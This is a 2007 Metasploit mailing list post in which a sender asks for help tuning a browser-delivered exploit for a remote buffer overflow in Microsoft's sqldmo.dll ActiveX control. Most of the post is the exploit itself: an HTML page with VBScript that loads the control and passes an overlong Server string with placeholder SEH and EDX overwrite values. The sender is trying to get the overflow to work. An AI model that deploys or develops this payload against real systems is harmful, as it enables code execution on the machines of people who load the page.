Metasploit mailing list archives

Microsoft SQL Server Distributed Management Objects OLE DLL for

From: manish.gupta at ariosesoftware.com (Manish Gupta)
Date: Thu, 13 Sep 2007 18:04:39 +0530

Hi

 

 

Am working on "Microsoft SQL Server Distributed Management Objects OLE DLL
for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" on this
vulnerability whose exploit is 
 
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'
/></object>
<script language='vbscript'>
 
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As
Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4
 
'edx = ecx
edx       ="bb"
seh       ="aa"
StartMode =True
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login     ="aaaaaaaa"
Password  ="bbbbbbbb"
 
SQLServer.Start StartMode ,Server ,Login ,Password
 
</script>
</html>
 
 
 
I am not able to find the server length so please help me. 
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
\\
 

 

 

Regards

Manish Gupta

Ariose Software 

Noida (U.P)

Mbl:-+91-9891650667

 

 

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070913/9258a5fb/attachment.htm>

Current thread:

Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)
- <Possible follow-ups>
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL for Rhys Kidd (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL for Manish Gupta (Sep 13)